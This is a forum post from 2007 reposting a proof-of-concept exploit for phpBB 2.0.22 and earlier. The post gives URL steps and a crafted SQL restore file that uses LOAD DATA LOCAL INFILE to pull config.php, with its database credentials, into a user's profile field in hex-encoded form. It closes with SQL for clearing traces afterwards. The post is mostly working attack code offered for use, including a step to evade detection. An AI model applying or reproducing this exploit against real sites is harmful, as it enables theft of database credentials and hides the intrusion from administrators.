Kekkei Posted December 10, 2007 Report Posted December 10, 2007 ## phpBB <= 2.0.22 Remote Database Authentication Details POC#### This text will show you how to get the content of the file## config.php with the 'LOCAL INFILE' SQL command. You can also## do it with 'LOAD_FILE' but you'll need file privileges, that's## not interesting. To do it, you'll need Administrator rights## (we'll use admin_db_utilities.php) and local_infile=ON## (you don't need file privileges, that's why it's quite cool).## PHP scripts should not permit the user to execute SQL commands.#### 1 Go to http://<victim>/login.php?redirect=admin/index.php&admin=1## 2 Log in as Administrator#### 3 Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid>## 4 You'll get a full path disclosure, note it somewhere#### 5 Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid>## 6 Choose "Structure-Only backup" then click on "Start Backup"## 7 Now open the file and search the table prefix, note it#### 8 Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid>## 9 Create a file which have this content [replace <phpbb_fullpath>,<user>,<prefix>]:## /*----------------------------------------------------------------------*/## CREATE TABLE tmp_hack(content text, email text, viewemail text);## LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__';## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE## username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>');## UPDATE <prefix>users SET user_viewemail=0, user_email=## CONCAT('"><span class="gen">Encoded content</span><input',## UNHEX(20),'type="text" value="',## (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden')## WHERE username='<user>';## /*----------------------------------------------------------------------*/## 10 Choose the file then click on "Start Restore"#### 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content## 12 This is the encoded content of the file config.php, use the pack() function to decode it## 13 For example, with php, type this in your shell: php -r print(pack('H*','<encoded_file>'));## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php)#### 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]:## /*----------------------------------------------------------------------*/## UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack),## user_email=(SELECT email FROM tmp_hack) WHERE username='<user>';## DROP TABLE tmp_hack;## /*----------------------------------------------------------------------*/#### by DarkFig <gmdarkfig (at) gmail (dot) com>## http://acid-root.new.fr/## #acidroot@irc.worldnet.net Quote
